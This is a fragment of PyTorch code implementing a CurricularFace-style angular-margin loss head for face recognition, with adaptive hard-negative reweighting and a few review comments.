        self.kernel = Parameter(torch.Tensor(feat_dim, num_class))
        # Adaptive curriculum parameter t, persisted as a buffer.
        self.register_buffer('t', torch.zeros(1))
        nn.init.normal_(self.kernel, std=0.01)
    def forward(self, feats, labels):
        kernel_norm = F.normalize(self.kernel, dim=0)
        cos_theta = torch.mm(feats, kernel_norm)
        cos_theta = cos_theta.clamp(-1, 1)  # for numerical stability
        with torch.no_grad():
            # NOTE(review): computed but never used afterwards.
            origin_cos = cos_theta.clone()
        target_logit = cos_theta[torch.arange(0, feats.size(0)), labels].view(-1, 1)
        sin_theta = torch.sqrt(1.0 - torch.pow(target_logit, 2))
        cos_theta_m = target_logit * self.cos_m - sin_theta * self.sin_m #cos(target+margin)
        # Hard negatives: non-target logits larger than the margined target.
        mask = cos_theta > cos_theta_m
        final_target_logit = torch.where(target_logit > self.threshold, cos_theta_m, target_logit - self.mm)
        hard_example = cos_theta[mask]
        with torch.no_grad():
            # EMA update of t (momentum 0.99) — mutated on every forward pass.
            self.t = target_logit.mean() * 0.01 + (1 - 0.01) * self.t
        # Emphasise hard negatives in place: cos -> cos * (t + cos).
        cos_theta[mask] = hard_example * (self.t + hard_example)
        # Write the margined target logit into each row's label column.
        cos_theta.scatter_(1, labels.view(-1, 1).long(), final_target_logit)
        output = cos_theta * self.s
        return output
| true |